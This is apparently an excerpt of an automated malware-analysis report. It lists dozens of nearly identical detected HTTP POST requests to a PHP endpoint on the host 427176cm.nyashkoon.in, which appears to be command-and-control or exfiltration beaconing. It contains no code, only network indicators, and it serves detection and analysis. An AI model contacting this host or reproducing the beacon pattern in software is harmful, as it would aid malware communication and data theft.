                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
